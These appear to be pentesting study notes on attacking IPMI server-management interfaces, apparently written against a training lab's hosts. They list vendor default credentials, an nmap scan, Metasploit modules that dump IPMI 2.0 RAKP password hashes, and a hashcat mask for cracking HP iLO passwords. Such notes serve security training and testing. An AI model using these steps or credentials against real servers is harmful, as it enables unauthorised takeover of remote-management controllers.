# Pentesting IPMI

## Overview

* Intelligent Platform Management Interface
* Port: UDP 623
* Used for remote management of servers (out-of-band) independent of OS
* Common implementations: Dell iDRAC, HP iLO, Supermicro IPMI

## Default Credentials

| Product         | Username      | Password                            |
| --------------- | ------------- | ----------------------------------- |
| Dell iDRAC      | root          | calvin                              |
| HP iLO          | Administrator | Random 8-char (numbers + uppercase) |
| Supermicro IPMI | ADMIN         | ADMIN                               |

## Scanning

```
sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local
```

## Metasploit Version Scan

```
use auxiliary/scanner/ipmi/ipmi_version
set rhosts 10.129.42.195
run
```

## Hash Dumping (IPMI 2.0 RAKP Flaw)

* During IPMI 2.0 authentication, the server sends a salted SHA1 or MD5 hash of the user's password before the client authenticates
* This can be retrieved by any attacker with network access

```
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts 10.129.42.195
run
```

## Cracking IPMI Hashes

```
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
```

* HP iLO uses 8-char passwords with uppercase + digits — hashcat mask `?1?1?1?1?1?1?1?1 -1 ?d?u` works well